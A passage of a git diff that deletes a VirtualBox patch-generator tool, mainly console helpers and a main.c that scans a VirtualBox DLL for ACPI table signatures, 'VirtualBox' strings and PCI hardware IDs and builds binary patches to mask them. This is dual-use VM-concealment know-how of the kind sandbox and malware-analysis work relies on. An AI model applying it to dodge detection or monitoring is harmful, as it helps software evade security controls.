- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hh;hpp;hxx;hm;inl;inc;xsd
-
-
- {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
- rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
-
-
- {ef6cbfd0-0ca3-4afc-869c-678c8446d78d}
-
-
-
-
- Source Files
-
-
- Source Files
-
-
- minirtl
-
-
- minirtl
-
-
- minirtl
-
-
- minirtl
-
-
- minirtl
-
-
- minirtl
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- minirtl
-
-
- minirtl
-
-
- Header Files
-
-
- minirtl
-
-
- Header Files
-
-
- Header Files
-
-
-
-
- Resource Files
-
-
-
\ No newline at end of file
diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user b/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user
deleted file mode 100644
index ebdf692..0000000
--- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.user
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-
- c:\vbox\vboxdd_5.1.12.dll
- WindowsLocalDebugger
-
-
- c:\vbox\vboxdd_5.1.12.dll
- WindowsLocalDebugger
-
-
\ No newline at end of file
diff --git a/Source/Kasumi/VBoxPatchGen/cui.c b/Source/Kasumi/VBoxPatchGen/cui.c
deleted file mode 100644
index 9ce5dcd..0000000
--- a/Source/Kasumi/VBoxPatchGen/cui.c
+++ /dev/null
@@ -1,223 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2016 - 2018
-*
-* TITLE: CUI.C
-*
-* VERSION: 1.30
-*
-* DATE: 01 Aug 2018
-*
-* Console output.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include "global.h"
-
-HANDLE g_ConOut = NULL, g_ConIn = NULL;
-BOOL g_ConsoleOutput = FALSE;
-WCHAR g_BE = 0xFEFF;
-
-/*
-* cuiInitialize
-*
-* Purpose:
-*
-* Initialize console input/output.
-*
-*/
-VOID cuiInitialize(
- _In_ BOOL InitInput,
- _Out_opt_ PBOOL IsConsoleOutput
-)
-{
- ULONG dummy;
-
- g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
-
- if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE);
-
- SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
-
- g_ConsoleOutput = TRUE;
- if (!GetConsoleMode(g_ConOut, &dummy)) {
- g_ConsoleOutput = FALSE;
- WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);
- }
-
- if (IsConsoleOutput)
- *IsConsoleOutput = g_ConsoleOutput;
-
- return;
-}
-
-/*
-* cuiClrScr
-*
-* Purpose:
-*
-* Clear screen.
-*
-*/
-VOID cuiClrScr(
- VOID
-)
-{
- COORD coordScreen;
- DWORD cCharsWritten;
- DWORD dwConSize;
- CONSOLE_SCREEN_BUFFER_INFO csbi;
-
- coordScreen.X = 0;
- coordScreen.Y = 0;
-
- if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
- return;
-
- dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
-
- if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),
- dwConSize, coordScreen, &cCharsWritten))
- return;
-
- if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
- return;
-
- if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,
- dwConSize, coordScreen, &cCharsWritten))
- return;
-
- SetConsoleCursorPosition(g_ConOut, coordScreen);
-}
-
-/*
-* cuiPrintTextA
-*
-* Purpose:
-*
-* Output text to the console or file.
-* ANSI version.
-*
-*/
-VOID cuiPrintTextA(
- _In_ LPSTR lpText,
- _In_ BOOL UseReturn
-)
-{
- SIZE_T consoleIO;
- DWORD bytesIO;
- LPSTR Buffer;
-
- if (lpText == NULL)
- return;
-
- consoleIO = _strlen_a(lpText);
- if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
- return;
-
- consoleIO = 5 + consoleIO;
- Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
- if (Buffer) {
-
- _strcpy_a(Buffer, lpText);
- if (UseReturn) _strcat_a(Buffer, "\r\n");
-
- consoleIO = _strlen_a(Buffer);
-
- if (g_ConsoleOutput != FALSE) {
- WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- else {
- WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- HeapFree(GetProcessHeap(), 0, Buffer);
- }
-}
-
-/*
-* cuiPrintTextW
-*
-* Purpose:
-*
-* Output text to the console or file.
-* UNICODE version.
-*
-*/
-VOID cuiPrintTextW(
- _In_ LPWSTR lpText,
- _In_ BOOL UseReturn
- )
-{
- SIZE_T consoleIO;
- DWORD bytesIO;
- LPWSTR Buffer;
-
- if (lpText == NULL)
- return;
-
- consoleIO = _strlen_w(lpText);
- if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
- return;
-
- consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
- Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
- if (Buffer) {
-
- _strcpy(Buffer, lpText);
- if (UseReturn) _strcat_w(Buffer, TEXT("\r\n"));
-
- consoleIO = _strlen_w(Buffer);
-
- if (g_ConsoleOutput != FALSE) {
- WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- else {
- WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
- }
- HeapFree(GetProcessHeap(), 0, Buffer);
- }
-}
-
-/*
-* cuiPrintTextLastErrorA
-*
-* Purpose:
-*
-* Output LastError translated code to the console or file.
-* ANSI version.
-*
-*/
-VOID cuiPrintTextLastErrorA(
- _In_ BOOL UseReturn
- )
-{
- CHAR szTextBuffer[512];
- DWORD dwLastError = GetLastError();
-
- FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL);
- cuiPrintTextA(szTextBuffer, UseReturn);
-}
-
-/*
-* cuiPrintTextLastErrorW
-*
-* Purpose:
-*
-* Output LastError translated code to the console or file.
-* UNICODE version.
-*
-*/
-VOID cuiPrintTextLastErrorW(
- _In_ BOOL UseReturn
-)
-{
- WCHAR szTextBuffer[512];
- DWORD dwLastError = GetLastError();
-
- FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL);
- cuiPrintTextW(szTextBuffer, UseReturn);
-}
diff --git a/Source/Kasumi/VBoxPatchGen/cui.h b/Source/Kasumi/VBoxPatchGen/cui.h
deleted file mode 100644
index 229124f..0000000
--- a/Source/Kasumi/VBoxPatchGen/cui.h
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2016 - 2018
-*
-* TITLE: CUI.H
-*
-* VERSION: 1.30
-*
-* DATE: 01 Aug 2018
-*
-* Common header file for console ui.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#pragma once
-
-VOID cuiInitialize(
- _In_ BOOL InitInput,
- _Out_opt_ PBOOL IsConsoleOutput
- );
-
-#ifdef _UNICODE
-#define cuiPrintText cuiPrintTextW
-#define cuiPrintTextLastError cuiPrintTextLastErrorW
-#else
-#define cuiPrintText cuiPrintTextA
-#define cuiPrintTextLastError cuiPrintTextLastErrorA
-#endif
-
-
-VOID cuiPrintTextA(
- _In_ LPSTR lpText,
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextW(
- _In_ LPWSTR lpText,
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextLastErrorA(
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextLastErrorW(
- _In_ BOOL UseReturn
- );
-
-VOID cuiClrScr(
- VOID
- );
diff --git a/Source/Kasumi/VBoxPatchGen/main.c b/Source/Kasumi/VBoxPatchGen/main.c
deleted file mode 100644
index b72a3f1..0000000
--- a/Source/Kasumi/VBoxPatchGen/main.c
+++ /dev/null
@@ -1,639 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
-*
-* TITLE: MAIN.C
-*
-* VERSION: 1.20
-*
-* DATE: 04 Jan 2019
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#include "global.h"
-
-#define T_PROGRAMTITLE L"VirtualBox Patch Generator v1.2.0.1901"
-#define T_FILEINFAIL L"\r\nVPG: Error while processing input file"
-#define T_FILEOUTFAIL L"\r\nVPG: Error while processing output file"
-
-#define MAX_HWID_BLOCKS_DEEP 32
-#define MAX_PATCH_BLOCKS 256
-
-BINARY_PATCH_BLOCK_INTERNAL *DataBlocks;
-
-/*
-* FindPattern
-*
-* Purpose:
-*
-* Lookup pattern in buffer.
-*
-*/
-PVOID FindPattern(
- CONST PBYTE Buffer,
- SIZE_T BufferSize,
- CONST PBYTE Pattern,
- SIZE_T PatternSize
-)
-{
- PBYTE p = Buffer;
-
- if (PatternSize == 0)
- return NULL;
- if (BufferSize < PatternSize)
- return NULL;
- BufferSize -= PatternSize;
-
- do {
- p = memchr(p, Pattern[0], BufferSize - (p - Buffer));
- if (p == NULL)
- break;
-
- if (memcmp(p, Pattern, PatternSize) == 0)
- return p;
-
- p++;
- } while (BufferSize - (p - Buffer) > 0);
-
- return NULL;
-}
-
-/*
-* SaveTable
-*
-* Purpose:
-*
-* Build and save table to output file.
-*
-*/
-BOOL SaveTable(
- _In_ BINARY_PATCH_BLOCK_INTERNAL *PatchBlock,
- _In_ LPWSTR OutputFileName,
- _In_ UINT BlockCount
-)
-{
- UINT i;
- BOOL bResult = FALSE;
- PUCHAR Table = NULL;
- SIZE_T TableSize = 0;
- HANDLE hFile = INVALID_HANDLE_VALUE;
- DWORD dwEntrySize, ProcessedSize;
- TCHAR szOutputFileName[MAX_PATH * 2];
-
- TableSize = BlockCount * sizeof(BINARY_PATCH_BLOCK_INTERNAL);
- Table = (PUCHAR)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, TableSize);
- if (Table) {
- ProcessedSize = 0;
- for (i = 0; i < BlockCount; i++) {
- dwEntrySize = sizeof(ULONG) + sizeof(UCHAR) + (sizeof(UCHAR) * PatchBlock[i].DataLength);
- if (ProcessedSize + dwEntrySize > (DWORD)TableSize)
- break;
- RtlCopyMemory(&Table[ProcessedSize], &PatchBlock[i], dwEntrySize);
- ProcessedSize += dwEntrySize;
- }
- //error converting table, entries are missing
- if (i != BlockCount) {
- RtlFreeHeap(GetProcessHeap(), 0, Table);
- return FALSE;
- }
- RtlSecureZeroMemory(szOutputFileName, sizeof(szOutputFileName));
- GetCurrentDirectory(MAX_PATH, szOutputFileName);
- _strcat(szOutputFileName, OutputFileName);
-
- hFile = CreateFile(szOutputFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hFile != INVALID_HANDLE_VALUE) {
- WriteFile(hFile, Table, ProcessedSize, &dwEntrySize, NULL);
- CloseHandle(hFile);
- bResult = (dwEntrySize == ProcessedSize);
- }
- RtlFreeHeap(GetProcessHeap(), 0, Table);
- }
- return bResult;
-}
-
-/*
-* ProcessInputFile
-*
-* Purpose:
-*
-* Program entry point.
-*
-*/
-UINT ProcessInputFile(
- _In_ LPWSTR lpszPath
-)
-{
- UINT uResult = (UINT)-1;
- BOOL cond = FALSE;
- ULONG rlen, c = 0, d = 0;
-
- HANDLE fh = NULL, sec = NULL;
- OBJECT_ATTRIBUTES attr;
- UNICODE_STRING usFileName;
- IO_STATUS_BLOCK iosb;
- NTSTATUS status;
- PBYTE DllBase = NULL, Pattern;
- SIZE_T DllVirtualSize;
-
- TCHAR InputFile[MAX_PATH + 1], LogBuffer[MAX_PATH];
-
- RtlSecureZeroMemory(&usFileName, sizeof(usFileName));
-
- do {
-
- rlen = 0;
- RtlSecureZeroMemory(InputFile, sizeof(InputFile));
- GetCommandLineParam(lpszPath, 1, InputFile, MAX_PATH, &rlen);
- if (rlen == 0)
- break;
-
- if (GetFileAttributes(InputFile) == (DWORD)-1)
- break;
-
- if (RtlDosPathNameToNtPathName_U(InputFile, &usFileName, NULL, NULL) == FALSE)
- break;
-
- InitializeObjectAttributes(&attr, &usFileName,
- OBJ_CASE_INSENSITIVE, NULL, NULL);
- RtlSecureZeroMemory(&iosb, sizeof(iosb));
-
- status = NtCreateFile(&fh, SYNCHRONIZE | FILE_READ_DATA,
- &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN,
- FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
-
- if (!NT_SUCCESS(status))
- break;
-
- status = NtCreateSection(&sec, SECTION_ALL_ACCESS, NULL,
- NULL, PAGE_READONLY, SEC_IMAGE, fh);
- if (!NT_SUCCESS(status))
- break;
-
- DllBase = NULL;
- DllVirtualSize = 0;
- status = NtMapViewOfSection(sec, NtCurrentProcess(), &DllBase,
- 0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY);
- if (!NT_SUCCESS(status))
- break;
-
- DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY,
- sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS);
- if (DataBlocks == NULL)
- break;
-
- c = 0;
-
- //locate VBOX patterns
- cuiPrintText(TEXT("\r\nPattern matching: 'VBOX'\r\n"), TRUE);
-
- //
- // FACP
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)FACP_PATTERN, sizeof(FACP_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("FACP\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern FACP not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // RSDT
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)RSDT_PATTERN, sizeof(RSDT_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("RSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern RSDT not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // XSDT
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)XSDT_PATTERN, sizeof(XSDT_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("XSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern XSDT not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // APIC
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)APIC_PATTERN, sizeof(APIC_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("APIC\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern APIC not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // HPET
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)HPET_PATTERN, sizeof(HPET_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("HPET\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern HPET not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // MCFG
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)MCFG_PATTERN, sizeof(MCFG_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("MCFG\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern MCFG not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // VBOXCPU
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VBOXCPU_PATTERN, sizeof(VBOXCPU_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(2 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCPU\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCPU not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // VBOX 1.0 CDROM
- //
- /*RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)CDROMVBOX_PATTERN, sizeof(CDROMVBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(12 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCDROM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCDROM not found"));
- }
- cuiPrintText(LogBuffer, TRUE); */
-
- //
- // VBOX generic
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)JUSTVBOX_PATTERN, sizeof(JUSTVBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOX\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOX generic not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //locate VirtualBox pattern
- cuiPrintText(TEXT("\r\nPattern matching: 'VirtualBox'\r\n"), TRUE);
-
- //
- // 'VirtualBox'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)JUSTVIRTUALBOX_PATTERN, sizeof(JUSTVIRTUALBOX_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox__'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOX2020_PATTERN, sizeof(VIRTUALBOX2020_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox__\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox__ not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox GIM'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOXGIM_PATTERN, sizeof(VIRTUALBOXGIM_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox GIM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tVirtualBox GIM pattern not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // 'VirtualBox VMM'
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)VIRTUALBOXVMM_PATTERN, sizeof(VIRTUALBOXVMM_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox VMM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox VMM not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //locate Configuration pattern
- cuiPrintText(TEXT("\r\nPattern matching: Configuration\r\n"), TRUE);
-
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)CFGSTRINGS_PATTERN, sizeof(CFGSTRINGS_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("Cfg\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern Configuration not found"));
- }
- cuiPrintText(LogBuffer, TRUE);
-
- //
- // HWID
- //
- cuiPrintText(TEXT("\r\nPattern matching: Hardware ID\r\n"), TRUE);
-
- //
- // 80EE
- //
-
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- d = 0;
- Pattern = DllBase;
- do {
- Pattern = FindPattern(
- (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
- (CONST PBYTE)PCI80EE_PATTERN, sizeof(PCI80EE_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_1);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_1, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("80EE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
- c += 1;
- d += 1;
- if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nVPG: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
- break;
- }
- }
- else {
- break;
- }
- Pattern++;
- } while (DllVirtualSize - (Pattern - DllBase) > 0);
-
- //
- // BEEF
- //
-
- d = 0;
- Pattern = DllBase;
- do {
- Pattern = FindPattern(
- (CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
- (CONST PBYTE)PCIBEEF_PATTERN, sizeof(PCIBEEF_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_2);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_2, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("BEEF\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
- c += 1;
- d += 1;
- if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nVPG: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
- break;
- }
- }
- else {
- break;
- }
- Pattern++;
- } while (DllVirtualSize - (Pattern - DllBase) > 0);
-
- //
- // CAFE
- //
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
- (CONST PBYTE)DllBase, DllVirtualSize,
- (CONST PBYTE)PCICAFE_PATTERN, sizeof(PCICAFE_PATTERN));
- if (Pattern) {
- DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
- DataBlocks[c].DataLength = sizeof(HWID_PATCH);
- RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("CAFE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- c += 1;
- }
- else {
- _strcpy(LogBuffer, TEXT("\tPattern CAFE not found"));
- }
